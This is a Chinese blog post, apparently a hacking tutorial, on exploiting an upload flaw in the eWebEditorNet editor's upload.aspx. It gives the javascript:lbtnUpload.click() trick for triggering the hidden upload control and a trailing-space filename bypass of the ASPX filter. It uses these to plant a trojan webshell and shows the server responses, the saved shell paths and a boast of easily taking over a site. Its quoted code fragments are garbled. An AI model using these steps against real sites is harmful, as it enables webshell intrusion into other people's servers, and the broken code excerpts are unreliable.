只是简单的对ID进行验证,只要构造javascript:lbtnUpload.cli" />

aspx编辑器eWebEditor源码分析 上传漏洞拿shell

admin/2020-07-07

  eWebEditorNet 主要是一个upload.aspx文件存在上传漏洞。

  原理:

  代码

  "uploadfile" style="file" size="uploadfile" runat=

  "lbtnUpload" runat=

  "JavaScript">

  只是简单的对ID进行验证,只要构造javascript:lbtnUpload.click();满足条件达到上传木马的效果。成功以后查看源代码

  代码

  a "lbtnUpload"

  "javascript:__doPostBack('lbtnUpload','')"script

  'javascript'

  木马的具体地址为

  /eWebEditorNet/UploadFile/200801141044412198.cer

  这样就轻松的拿下了一个网站。

  当访问eWebEditorNet/Upload.aspx时,可以看到只有浏览,缺少了上传按钮....aspx编辑器eWebEditor源码分析  上传漏洞拿shell

  不过没关系,在选择好我们要上传的木马以后,直接再在IE当中输入javascript:lbtnUpload.click();回车

  aspx编辑器eWebEditor源码分析  上传漏洞拿shell

  上传完毕了,看看返回的原代码...[鼠标右键点查看源文件]

  parent.UploadError('不允许上传此类型的文件!!');

  看来上传失败了...做了过滤,限制ASPX的文件上传了.....

  继续回到前面,我们在地址后面打一个空格试试

  aspx编辑器eWebEditor源码分析  上传漏洞拿shell

  parent.UploadSavedFinish('20081232115126366.aspx ','jackie.aspx

  ');history.back();

  嘿嘿....绕过了限制......成功的上传了ASPX文件....

  文件默认的上传后保存的地址是eWebEditorNet/UploadFile/现在来看看是否上传成功.....

  aspx编辑器eWebEditor源码分析  上传漏洞拿shell

  接下来,别再问我还能做什么了,我也不知道.....



上一篇:马兰花电影介绍 揭秘经典中国影视作品
下一篇:没有了